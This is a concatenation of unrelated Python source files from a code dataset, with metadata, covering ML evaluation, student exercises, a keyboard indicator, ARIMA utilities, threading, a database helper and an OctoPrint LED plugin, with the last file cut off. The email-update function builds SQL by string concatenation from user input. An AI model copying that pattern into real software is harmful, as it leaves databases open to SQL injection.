num_classes=num_classes,\n window_sizes=window_sizes,\n step_sizes=step_sizes,\n device=device)\n\n # determine the number of images that each image was cut into\n cut_count = _determine_cut_count(image_file_paths, window_sizes, step_sizes)\n cut_count /= len(image_file_paths)\n\n results.append({\n \"acc\": np.round(acc, 2),\n \"acc_class\": np.round(acc_class, 2),\n \"mIoU\": np.round(mIoU, 2),\n \"fWIoU\": np.round(fWIoU, 2),\n \"window_sizes\": window_sizes,\n \"step_sizes\": step_sizes,\n \"cut_count_per_image\": cut_count\n })\n\n return results\n\n\ndef _determine_cut_count(image_file_paths, window_sizes, step_sizes):\n \"\"\"\n Determine how many cuts the given images will be cut into based on the given parameters\n :param image_file_paths: list of images that the cuts will be calculated for\n :param window_sizes: parameter for cutting the images\n :param step_sizes: parameter for cutting the images\n :return: number of cuts\n \"\"\"\n\n cut_count = 0\n for image_file_path in image_file_paths:\n image = cv2.imread(image_file_path)\n\n for window_size, step_size in zip(window_sizes, step_sizes):\n cuts, _ = cut_windows(image, window_size, step_size)\n cut_count += len(cuts)\n\n return cut_count\n","sub_path":"coral_reef/ml/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163056590","text":"from numpy import random\n\ndef create_ran_file(filename, eline, ecol):\n output=open(filename, 'w')\n randArray = random.random(size=(eline,ecol))\n\n for line in randArray:\n i=0\n for elem in line:\n strelem='%f'%elem\n if i is 0:\n output.write(strelem)\n else:\n output.write(' '+strelem)\n i+=1\n output.write('\\n')\n output.close()\n return\n\ncreate_ran_file('test.txt', 5, 4)\n","sub_path":"machinelearninginaction/RamData/CreateRanData.py","file_name":"CreateRanData.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"611553665","text":"def add(x,y): # khai bao cua funtion\n r = x+y\n return r # cho r thoat ra khoi def\n\ndef eval(x, y, op):\n # x = int(input(\"x = \"))\n # y = int(input(\"y = \"))\n if op == \"+\":\n r = x+y # return x+y\n elif op == \"-\":\n r = x-y\n elif op == \"*\":\n r = x*y\n elif op == \"/\":\n r = x/y\n\n return r # tra ve ket qua hoac dung chuong trinh\nprint(eval(9, 10, \"-\"))\n\n \n\n# a = int(input(\"a = \"))\n# b = int(input(\"b = \"))\n# t = add(a, b)\n# print(t)","sub_path":"labs3/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"347954594","text":"# Создать (не программно) текстовый файл, в котором каждая строка должна содержать данные о фирме:\n# название, форма собственности, выручка, издержки.\n# Необходимо построчно прочитать файл, вычислить прибыль каждой компании, а также среднюю прибыль.\n# Если фирма получила убытки, в расчет средней прибыли ее не включать.\n# Дал��е реализовать список. Он должен содержать словарь с фирмами и их прибылями, а также словарь со средней прибылью.\n# Если фирма получила убытки, также добавить ее в словарь (со значением убытков).\n\nimport json\n\nwith open('5.7.json', 'w') as fj:\n with open('5.7.txt', encoding='utf-8') as f:\n # profit ={line.split()[0]: int(line.split()[2])-int(line.split()[3]) for line in f}\n # result =[profit, {'average_profit': round(sum([int(i) for i in profit.values() if int(i) > 0]) /\n # len([int(i) for i in profit.values() if int(i) > 0]))}\n result = {}\n profit = {}\n sum_profit = 0\n n = 0\n for line in f:\n a = line.split()\n\n if (int(a[2]) - int(a[3])) > 0:\n c = int(a[2]) - int(a[3])\n profit.update({a[0]:c})\n sum_profit = sum_profit + c\n n = n + 1\n av_profit = sum_profit / n\n print(profit)\n profit.update({'average_profit': av_profit})\n result = profit\n json.dump(result, fj, ensure_ascii=False, indent=4)","sub_path":"Lesson 5/P5.7.py","file_name":"P5.7.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27635225","text":"# Dict to hold pseudo registers, defaulted to 0 for simplicity\r\nReg = {\"x0\":0,\"x1\":0,\r\n \"x2\":0,\"x3\":0,\r\n \"x4\":0,\"x5\":0,\r\n \"x6\":0,\"x7\":0,\r\n \"x8\":0,\"x9\":0,}\r\n\r\n# Dict to hold Flags that are used for cmp and branching\r\nFlags = {\"eq\":False,\r\n \"gt\":False,\r\n \"lt\":False,\r\n \"ne\":False}\r\n\r\n# Dict to hold all labels and their corresponding line numbers\r\nLabels = {}\r\n\r\n''' Move Instruction '''\r\ndef mov(dest, data):\r\n dest = dest.replace(\" \", \"\").replace(\",\", \"\")\r\n data = data.replace(\" \", \"\").replace(\",\", \"\")\r\n if \"x\" in data:\r\n Reg[dest] = Reg[data]\r\n elif \"x\" not in data:\r\n Reg[dest] = int(data)\r\n elif dest not in Reg:\r\n print(\"Invalid input\")\r\n\r\n''' conditional and branching instructions '''\r\ndef cmp(op1, op2):\r\n if \"x\" in op1:\r\n op1 = op1.replace(\" \", \"\").replace(\",\", \"\")\r\n x = Reg[op1]\r\n else:\r\n x = int(op1)\r\n if \"x\" in op2:\r\n op2 = op2.replace(\" \", \"\").replace(\",\", \"\")\r\n y = Reg[op2]\r\n else:\r\n y = int(op2)\r\n Flags[\"eq\"] = x == y\r\n Flags[\"lt\"] = x < y\r\n Flags[\"gt\"] = x > y\r\n Flags[\"ne\"] = x != y\r\n\r\n''' Arithmetic Instructions '''\r\ndef add(dest, op1, op2):\r\n dest = dest.replace(\" \", \"\").replace(\",\", \"\")\r\n x = op1\r\n y = op2\r\n if dest in Reg:\r\n if \"x\" in op1:\r\n op1 = op1.replace(\" \", \"\").replace(\",\", \"\")\r\n x = Reg[op1]\r\n if \"x\" in op2:\r\n op2 = op2.replace(\" \", \"\").replace(\",\", \"\")\r\n y = Reg[op2]\r\n Reg[dest] = int(x) + int(y)\r\n else:\r\n print(\"invalid dest\")\r\n\r\ndef mul(dest, op1, op2):\r\n x = op1\r\n y = op2\r\n if dest in Reg:\r\n if \"x\" in op1:\r\n x = Reg[op1]\r\n if \"x\" in op2:\r\n y = Reg[op2]\r\n Reg[dest] = int(x) * int(y)\r\n else:\r\n print(\"invalid dest\")\r\n\r\ndef sub(dest, op1, op2):\r\n x = op1\r\n y = op2\r\n if dest in Reg:\r\n if \"x\" in op1:\r\n x = Reg[op1]\r\n if \"x\" in op2:\r\n y = Reg[op2]\r\n Reg[dest] = int(x) - int(y)\r\n else:\r\n print(dest)\r\n print(\"invalid dest\")\r\n\r\n''' Parsing '''\r\ndef parse(line):\r\n parsed = [x for x in line.split(\" \") if x != \"\"]\r\n for i in range(0, len(parsed)):\r\n # comment handling\r\n if \"@\" in parsed[i]:\r\n parsed[i] = \"\"\r\n else:\r\n parsed[i] = parsed[i].replace(\" \", \"\").replace(\",\", \"\").replace(\"#\", \"\")\r\n return parsed\r\n\r\n''' Get Labels '''\r\ndef getLabels(inputFile):\r\n for k in range(0, len(inputFile)):\r\n tmp = parse(inputFile[k])\r\n if \":\" in tmp[0]:\r\n Labels[tmp[0][:-1]] = k","sub_path":"reg.py","file_name":"reg.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334341621","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 29 18:03:05 2020\r\n\r\n@author: Sansrit Paudel\r\n\r\n\"\"\"\r\n\r\nfrom sys import argv\r\n\r\n#TO CHECK THE FILE IF EXISTS OR NOT\r\n\r\n\r\nfrom os.path import exists\r\n\r\nscript, file1, file2 = argv\r\n\r\nprint(\"Copying form %s to %s \" %(file1,file2 ))\r\n\r\n#OPEN THE FILE AND STORING ON VARIABLE\r\n\r\n\r\nin_file = open(file1)\r\n\r\n#READ FORM FILE 1 VARIABLE TO NEXT VARIABLE\r\n\r\n\r\nindata = in_file.read()\r\n\r\n#RETURNS THE TOTAL LENGTH ON THE FILES\r\n\r\n\r\nprint(\"The input file is %d bytes long\" %len(indata))\r\n\r\n\r\n#RETURNS THE BOOLEAN VALUE IF FILE 2 EXISTS OR NOT..\r\nprint(\"Does the output file exists? %r\" %exists(file2))\r\n\r\nprint(\"Ready, hit RETURN to continue , CTRL-C to abort.\")\r\n\r\n\r\ninput()\r\n\r\n#FIRST OPEN THEN SPECIFY THE MODE WRITE, AND STORE IN VARIBALE AND . \r\n\r\n\r\nfile2 = open(file2, 'w')\r\n\r\n#USING THE METHOD WRITE TO NEXT FILE NAME.\r\n\r\nfile2.write(file1)\r\n\r\n\r\nprint(\"Alright , all done \")\r\n\r\nfile2.close()\r\nin_file.close()\r\n\r\n\r\n","sub_path":"Basics/14.More_on_files.py","file_name":"14.More_on_files.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399313086","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# indicator-keyboard-led - simulate keyboard lock keys LED\n# Copyright (c) 2016 Adrian I Lam \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHOR OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n#\n# I would like to thank Tobias Schlitt , who wrote\n# indicator-chars which I used\n# as a reference when writing this software.\n\nimport signal\nimport subprocess\nfrom os import path\nimport argparse\nimport sys\nimport gi\ngi.require_version('Gdk', '3.0')\ngi.require_version('Gtk', '3.0')\ngi.require_version('AppIndicator3', '0.1')\nfrom gi.repository import Gdk, Gtk, AppIndicator3\n\nSCRIPT_DIR = path.dirname(path.realpath(__file__))\nimport gettext\nt = gettext.translation('default', path.join(SCRIPT_DIR, 'locale'))\n_ = t.gettext\n\nclass IndicatorKeyboardLED:\n locks = { 'N': _('Num'), 'C': _('Caps'), 'S': _('Scroll') }\n \n def __init__(self, short=False, order='NCS'):\n self.indicator = AppIndicator3.Indicator.new(\n 'indicator-keyboard-led',\n path.join(SCRIPT_DIR, 'icon.svg'),\n AppIndicator3.IndicatorCategory.APPLICATION_STATUS)\n self.indicator.set_status(AppIndicator3.IndicatorStatus.ACTIVE)\n\n if short:\n self.locks = { 'N': _('N'), 'C': _('C'), 'S': _('S') }\n\n keymap = Gdk.Keymap.get_default()\n keymap.connect('state-changed', self.update_indicator, order)\n self.update_indicator(keymap, order)\n\n menu = Gtk.Menu()\n items = {\n 'N': Gtk.MenuItem.new_with_label(_('Num Lock')),\n 'C': Gtk.MenuItem.new_with_label(_('Caps Lock')),\n 'S': Gtk.MenuItem.new_with_label(_('Scroll Lock'))\n }\n items['N'].connect('activate', self.send_keypress, 'Num_Lock')\n items['C'].connect('activate', self.send_keypress, 'Caps_Lock')\n items['S'].connect('activate', self.send_keypress, 'Scroll_Lock')\n\n for i in order:\n menu.append(items[i])\n\n quit_item = Gtk.MenuItem.new_with_label(_('Quit'))\n menu.append(Gtk.SeparatorMenuItem())\n menu.append(quit_item)\n quit_item.connect('activate', Gtk.main_quit)\n\n self.indicator.set_menu(menu)\n menu.show_all()\n\n def update_indicator(self, keymap, order):\n labels = []\n for i in order:\n if i == 'N':\n state = keymap.get_num_lock_state()\n elif i == 'C':\n state = keymap.get_caps_lock_state()\n elif i == 'S':\n state = keymap.get_scroll_lock_state()\n else:\n raise ValueError('Invalid value in ORDER')\n labels += [('⚫' if state else '⚪') + self.locks[i]]\n self.indicator.set_label(' '.join(labels), '')\n\n def send_keypress(self, menuitem, keystroke):\n subprocess.call(['xdotool', 'key', keystroke])\n\ndef validate_order(args):\n args.order = args.order.upper()\n for i in args.order:\n if i not in ['N', 'C', 'S']:\n sys.exit('Illegal character in ORDER. (Choices: [N, C, S])')\n if len(args.order) != len(set(args.order)):\n sys.exit('Repeated character in ORDER. '\n 'Please specify each lock at most once.')\n\nif __name__ == '__main__':\n signal.signal(signal.SIGINT, lambda signum, frame: Gtk.main_quit())\n\n parser = argparse.ArgumentParser(\n description='indicator-keyboard-led - simulate keyboard lock keys LED',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-s', '--short', required=False, action='store_true',\n help='use short label, i.e. ⚫N ⚫C ⚫S instead of ⚫Num ⚫Caps ⚫Scroll')\n parser.add_argument('-o', '--order', required=False, default='NCS',\n help='specify the order of the locks displayed, e.g. CSN for '\n '⚫Caps ⚫Scroll ⚫Num, or NC for ⚫Num ⚫Caps without Scroll lock')\n args = parser.parse_args()\n validate_order(args)\n\n IndicatorKeyboardLED(short=args.short, order=args.order)\n Gtk.main()\n","sub_path":"indicator-keyboard-led.py","file_name":"indicator-keyboard-led.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"579259150","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.arima_model import ARMAResults\nfrom pyramid.arima import auto_arima\n\nplt.style.use('seaborn-dark')\nplt.rcParams[\"axes.edgecolor\"] = \"black\"\nplt.rcParams[\"axes.linewidth\"] = 1\n\n# ----------------------------- #\n# define the object time series #\n# ----------------------------- #\ndef get_ts():\n rng = pd.date_range('1/1/2018', periods=31, freq='H')\n ts = pd.Series(np.random.randn(len(rng)), index=rng)\n return ts\n\n\ndef read_ts(file_name):\n data = pd.read_csv(file_name)\n times_values = pd.to_datetime(data[data.columns[0]])\n num_values = data[data.columns[1]]\n ts = pd.Series(num_values.values, index=times_values)\n return ts\n\n\n# ------------------- #\n# check if stationary #\n# ------------------- #\n\ndef plot_rolling_avg(ts):\n assert isinstance(ts, pd.Series)\n rol_mean = ts.rolling(window=14, center=False).mean()\n rol_std = ts.rolling(window=14, center=False).std()\n orig = plt.plot(ts, label='Original')\n mean = plt.plot(rol_mean, label='Rolling Mean')\n std = plt.plot(rol_std, label='Rolling Std')\n plt.legend(loc='best')\n plt.title('Rolling Mean & Standard Deviation')\n plt.show()\n\n\ndef is_Dickey_Fuller_rejected(ts):\n assert isinstance(ts, pd.Series)\n test_param = adfuller(ts, autolag='AIC')\n return test_param[1] < 0.05\n\n\n# --------------------------------- #\n# make stationary by removing trend #\n# --------------------------------- #\n\ndef remove_trend(ts):\n assert isinstance(ts, pd.Series)\n rol_mean = ts.rolling(window=14, center=False).mean()\n ts_diff = ts - rol_mean\n ts_diff.dropna(inplace=True)\n return ts_diff\n\n\n# ------------------------------ #\n# make stationary by differences #\n# ------------------------------ #\n\ndef get_diff(ts):\n ts_diff = ts - ts.shift()\n ts_diff.dropna(inplace=True)\n return ts_diff\n\n\n# -------------------------------- #\n# make stationary by decomposition #\n# -------------------------------- #\n\ndef get_decomposition(ts, plot=True):\n decomposition = seasonal_decompose(ts)\n\n trend = decomposition.trend\n seasonal = decomposition.seasonal\n residual = decomposition.resid\n\n if plot:\n plt.subplot(411)\n plt.plot(ts, label='Original')\n plt.legend(loc='best')\n plt.subplot(412)\n plt.plot(trend, label='Trend')\n plt.legend(loc='best')\n plt.subplot(413)\n plt.plot(seasonal, label='Seasonality')\n plt.legend(loc='best')\n plt.subplot(414)\n plt.plot(residual, label='Residuals')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.show()\n\n dec_dict = {'trend': trend,\n 'seasonal': seasonal,\n 'residual': residual}\n return dec_dict\n\n\ndef get_train_test_split(ts, ratio=2/3):\n assert isinstance(ts, pd.Series)\n idx = int(ratio*len(ts.index))\n train = ts[0:idx]\n test = ts[idx+1: len(ts.index)]\n return train, test\n\n\ndef train_ARIMA_model(train_ts):\n assert isinstance(train_ts, pd.Series)\n stepwise_model = auto_arima(train_ts, start_p=1, start_q=1,\n max_p=3, max_q=3, m=12,\n start_P=0, seasonal=True,\n d=1, D=1, trace=True,\n error_action='ignore',\n suppress_warnings=True,\n stepwise=True)\n print(stepwise_model.summary())\n return stepwise_model\n\n\ndef test_ARIMA_model(test_ts, stepwise_model, plot=True):\n assert isinstance(test_ts, pd.Series)\n future_forecast = stepwise_model.predict(n_periods=len(test_ts.index))\n future_forecast = pd.DataFrame(\n future_forecast, index=test_ts.index, columns=['prediction'])\n test_forecast = pd.concat([test_ts, future_forecast], axis=1)\n test_forecast.rename(columns={0: 'original'}, inplace=True)\n if plot:\n test_forecast.plot()\n plt.show()\n return test_forecast\n\n\ndef append_forecast(ts, test_forecast, plot=True):\n assert isinstance(ts, pd.Series)\n assert isinstance(test_forecast, pd.DataFrame)\n complete_prediction_df = pd.concat([ts, test_forecast], axis=1)\n complete_prediction_df.rename(columns={0: 'train_set'}, inplace=True)\n if plot:\n complete_prediction_df.plot()\n plt.show()\n return complete_prediction_df\n","sub_path":"src/time_series/ts_utils.py","file_name":"ts_utils.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479179320","text":"import os\nimport re\nimport string\nfrom typing import Callable, Dict, List, Optional\n\nimport numpy as np\n\n\nclass NestedSingleType:\n @staticmethod\n def is_iterable(obj):\n if isinstance(obj, str) or isinstance(obj, dict):\n return False\n try:\n iter(obj)\n except TypeError:\n return False\n return True\n\n @staticmethod\n def join(types: List[str]):\n nested_types = f\"{types.pop(-1)}\"\n\n for _type in types:\n nested_types = f\"{_type}<{nested_types}>\"\n return nested_types.lower()\n\n @classmethod\n def get_type(cls, obj, order: Optional[int] = None):\n _obj = obj\n\n types = []\n while cls.is_iterable(_obj):\n types.append(type(_obj).__name__)\n _obj = _obj[0]\n types.append(type(_obj).__name__)\n if order is not None:\n return types[order]\n\n return cls.join(types)\n\n\ndef remove_punctuations(text: str) -> str:\n regex = re.compile(\"[%s]\" % re.escape(string.punctuation))\n text = regex.sub(\" \", text)\n return \" \".join(text.split())\n\n\ndef bulk_remove_keys(obj: Dict, keys: List[str]) -> Dict:\n return {k: v for k, v in obj.items() if k not in keys}\n\n\ndef is_reduce_fn(fun: Callable) -> bool:\n result = np.array(fun([1, 2]))\n return result.size == 1\n\n\ndef set_env(name: str, value: str):\n if not isinstance(value, str):\n raise ValueError(f\"Expected type str for 'value', got {type(value)}.\")\n os.environ[name] = value\n\n\ndef replace(a: List, obj: object, index=-1):\n del a[index]\n a.insert(index, obj)\n return a\n","sub_path":"jury/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"650619211","text":"\"\"\"\nnormally we use coroutines, but for demo purposes we have threadpool too.\n\"\"\"\nimport ipaddress\n\nimport findssh.threadpool\n\nPORT = 22\nSERVICE = \"\"\nTIMEOUT = 1.0\n\n\ndef test_threadpool():\n net = findssh.netfromaddress(findssh.getLANip())\n hosts = findssh.threadpool.get_hosts(net, PORT, SERVICE, TIMEOUT)\n for host, svc in hosts:\n assert isinstance(host, ipaddress.IPv4Address)\n assert isinstance(svc, str)\n break\n","sub_path":"src/findssh/tests/test_threadpool.py","file_name":"test_threadpool.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8867560","text":"import threading\nimport time\n\nexit_flag = 0\n\n\nclass MyThread(threading.Thread):\n def __init__(self, threadID, name, counter):\n super(MyThread, self).__init__()\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self):\n print('Starting ' + self.name + '\\n')\n my_function(self.name, 2, self.counter)\n print('Exiting ' + self.name + '\\n')\n\n # function could be inside of class and be called self.my_...\n\n\ndef my_function(threadName, delay, counter):\n while counter:\n if exit_flag:\n thread.exit()\n # break\n time.sleep(delay)\n print('{0}: {1}'.format(threadName, time.ctime(time.time())))\n counter -= 1\n\n\ndef main():\n \"\"\" Main \"\"\"\n thread1 = MyThread(1, \"Thread - 1\", 5)\n thread2 = MyThread(2, \"Thread - 2\", 3)\n\n thread1.start()\n thread2.start()\n\n thread1.join()\n thread2.join()\n\n print('end program')\n\nif __name__ == '__main__':\n main()\n","sub_path":"threads/subclassthread.py","file_name":"subclassthread.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48914059","text":"import struct\r\nstruct_map = \"\"\"\r\nstruct中支持的格式如下表:\r\n\r\nFormat\tC Type\tPython\t字节数\r\n x \tpad byte \tno value \t1\r\n c \tchar \tstring of length 1 \t1 \r\n b \tsigned char \tinteger \t1 -128 ~ 127 \r\n B \tunsigned char \tinteger \t1 0 ~ 255\r\n ? \t_Bool \tbool \t1\r\n h \tshort \tinteger \t2\r\n H \tunsigned short \tinteger \t2\r\n i \tint \tinteger \t4\r\n I \tunsigned int \tinteger or lon \t4\r\n l \tlong \tinteger \t4\r\n L \tunsigned long \tlong \t4\r\n q \tlong long \tlong \t8\r\n Q \tunsigned long long \tlong \t8\r\n f \tfloat \tfloat \t4\r\n d \tdouble \tfloat \t8\r\n s \tchar[] \tstring \t1\r\n p \tchar[] \tstring \t1\r\n P \tvoid * \tlong \t \"\"\"\r\n\r\n# print(u'\\n说明:\\n\\tpack方法把指定类型数据转换成bytes类型, \\n\\tunpack方法把bytes类型转换成指定类型')\r\n# print(struct_map)\r\n#\r\n#\r\n# byte_a = b'\\xf0'\r\n#\r\n# print(u'\\n原始字节对象:\\n', byte_a, type(byte_a))\r\n# print('')\r\n#\r\n#\r\n# # 转无符号整数(0~255 int)类型\r\n# char_a = struct.unpack('B', byte_a)\r\n# print(u'转无符号整数(0~255 int)类型:\\n', char_a[0], type(char_a[0]), struct.pack('I',char_a[0]))\r\n# print('')\r\n#\r\n# # 转有符号整数(-128~127)类型\r\n# signed_char_a = struct.unpack('b', byte_a)\r\n# print(u'转有符号整数(-128~127)类型:\\n', signed_char_a[0], type(signed_char_a[0]), struct.pack('i',signed_char_a[0]))\r\n# print('')\r\n#\r\n# print(\"说明:\\n\\t负数在计算机中由正数按位取反加一表示,例如 1('\\\\x01\\\\x00\\\\x00\\\\x00') 按位取反加一得到 -1('\\\\xff\\\\xff\\\\xff\\\\xff')\\n\")\r\n#\r\n# # 无符号整数取反得到有符号整数\r\n# r_int_a = ~char_a[0]\r\n# print(u'无符号整数取反得到有符号整数:\\n', r_int_a, type(r_int_a), struct.pack('i', r_int_a))\r\n# print('')\r\n#\r\n# # 有符号整数转无符号整数\r\n# unsigned_r_int_a = struct.unpack('I', struct.pack('i', r_int_a))[0]\r\n# print(u'有符号整数转无符号整数:\\n', unsigned_r_int_a, type(unsigned_r_int_a), struct.pack('I', unsigned_r_int_a))\r\n# print('')\r\n#\r\n# # 取整数的最低位\r\n# print(u'取整数的最低位:')\r\n# print('整数:',unsigned_r_int_a, struct.pack('I', unsigned_r_int_a))\r\n# print('最低位:', struct.pack('I', unsigned_r_int_a)[0], struct.pack('b', struct.pack('I', unsigned_r_int_a)[0]))\r\n\r\ndef revers_bytes(b_data):\r\n \"\"\"\r\n 字节取反\r\n :param b_data: bytes 字节数据\r\n :return:\r\n \"\"\"\r\n print(u'获得字节数据:', b_data)\r\n b2int = struct.unpack('B', b_data)[0]\r\n\r\n print(u'获得转换后的整型数据', b2int)\r\n\r\n re = ~b2int\r\n\r\n print(u'取反后的数据', re)\r\n\r\n if re < 0:\r\n int2b = struct.pack('i', re)\r\n else:\r\n int2b = struct.pack('I',re)\r\n print(u'转换成字节类型:', int2b)\r\n\r\n print(u'取反后的字节数据:', struct.pack('b', int2b[0]))\r\n return struct.pack('b', int2b[0])\r\n\r\nprint(revers_bytes(b'\\xf0'))","sub_path":"messy/python_basic/数据处理/操作二进制数据/字节取反.py","file_name":"字节取反.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9421453","text":"\"\"\"create role table\n\nRevision ID: 8f2475c20488\nRevises: a669f2bc2a57\nCreate Date: 2019-05-18 12:35:08.928551\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"8f2475c20488\"\ndown_revision = \"a669f2bc2a57\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"role\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"name\", sa.String(20), nullable=False),\n sa.Column(\"permissions\", sa.JSON, nullable=False)\n )\n\n\ndef downgrade():\n op.drop_table(\"role\")\n","sub_path":"gem/apps/gem/alembic/versions/2019-05-18_8f2475c20488_create_role_table.py","file_name":"2019-05-18_8f2475c20488_create_role_table.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25074835","text":"#changes a user's email in the db- Coded by Carolyne\nimport psycopg2\nfrom flask import Flask, flash\nfrom config import config\n\ndef change_email(email, old_email):\n conn = None\n curr_user = None\n try:\n # read connection parameters from database.ini\n params = config()\n # connect to the PostgreSQL server\n print('Connecting to the %s database...' % (params['database']))\n conn = psycopg2.connect(**params)\n print('Connected.')\n \n # create a cursor\n cur = conn.cursor()\n cur.execute(\"UPDATE USR SET USR_EMAIL = '\" + email + \"' WHERE USR_EMAIL = '\" + old_email + \"'\")\n try:\n conn.commit()\n except psycopg2.Error as e:\n t_message = \"Database error: \" + e + \"/n SQL: \" + s\n print(t_message)\n return\n \n # close the communication with the PostgreSQL\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n # return the query result\n return\n","sub_path":"src/app/edit_email.py","file_name":"edit_email.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583372226","text":"#\n# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# coding=utf-8\n\nfrom __future__ import absolute_import\nimport re\n\nimport octoprint.plugin\nimport RPi.GPIO as GPIO\n\nclass LEDStripControlPlugin(octoprint.plugin.AssetPlugin,\n octoprint.plugin.SettingsPlugin,\n octoprint.plugin.ShutdownPlugin,\n octoprint.plugin.StartupPlugin,\n octoprint.plugin.TemplatePlugin):\n\n\tdef __init__(self):\n\t\tself._leds = dict(r=None, g=None, b=None)\n\n\tdef _setup_pin(self, pin):\n\t\tself._logger.debug(u\"_setup_pin(%s)\" % (pin,))\n\t\tif pin:\n\t\t\tp = None\n\t\t\tGPIO.setwarnings(False)\n\t\t\tGPIO.setmode(GPIO.BOARD)\n\t\t\tGPIO.setup(pin, GPIO.OUT)\n\t\t\tGPIO.output(pin, GPIO.HIGH)\n\t\t\tp = GPIO.PWM(pin, 100)\n\t\t\tp.start(100)\n\t\t\treturn p\n\n\tdef _unregister_leds(self):\n\t\tself._logger.debug(u\"_unregister_leds()\")\n\t\tfor i in ('r', 'g', 'b'):\n\t\t\tif self._leds[i]:\n\t\t\t\tself._leds[i].ChangeDutyCycle(0)\n\t\t\t\tself._leds[i].stop()\n\t\t\t\t\n\t\tGPIO.cleanup()\n\t\tself._leds = dict(r=None, g=None, b=None)\n\n\tdef _register_leds(self):\n\t\tself._logger.debug(u\"_register_leds()\")\n\t\tfor i in ('r', 'g', 'b'):\n\t\t\ttry:\n\t\t\t\tpin = self._settings.get_int([i])\n\t\t\t\tself._logger.debug(u\"got pin(%s)\" % (pin,))\n\t\t\t\tself._leds[i] = self._setup_pin(pin)\n\t\t\texcept(AttributeError, ValueError) as e:\n\t\t\t\tself._logger.error(e)\n\n\tdef on_after_startup(self):\n\t\tself._logger.debug(u\"LEDStripControl Startup\")\n\t\tself._logger.debug(u\"RPi.GPIO version %s\" % (GPIO.VERSION,))\n\n\tdef on_shutdown(self):\n\t\tself._logger.debug(u\"LEDStripControl Shutdown\")\n\t\tself._unregister_leds()\n\n\tdef HandleM150(self, comm_instance, phase, cmd, cmd_type, gcode, *args, **kwargs):\n\t\tif gcode and cmd.startswith(\"M150\"):\n\t\t\tself._logger.debug(u\"M150 Detected: %s\" % (cmd,))\n\t\t\t# Emulating Marlin 1.1.0's syntax\n # https://github.com/MarlinFirmware/Marlin/blob/RC/Marlin/Marlin_main.cpp#L6133\n\t\t\tdutycycles = {'r':0.0, 'g':0.0, 'b':0.0}\n\t\t\tfor match in re.finditer(r'([RGUBrgub]) *(\\d*)', 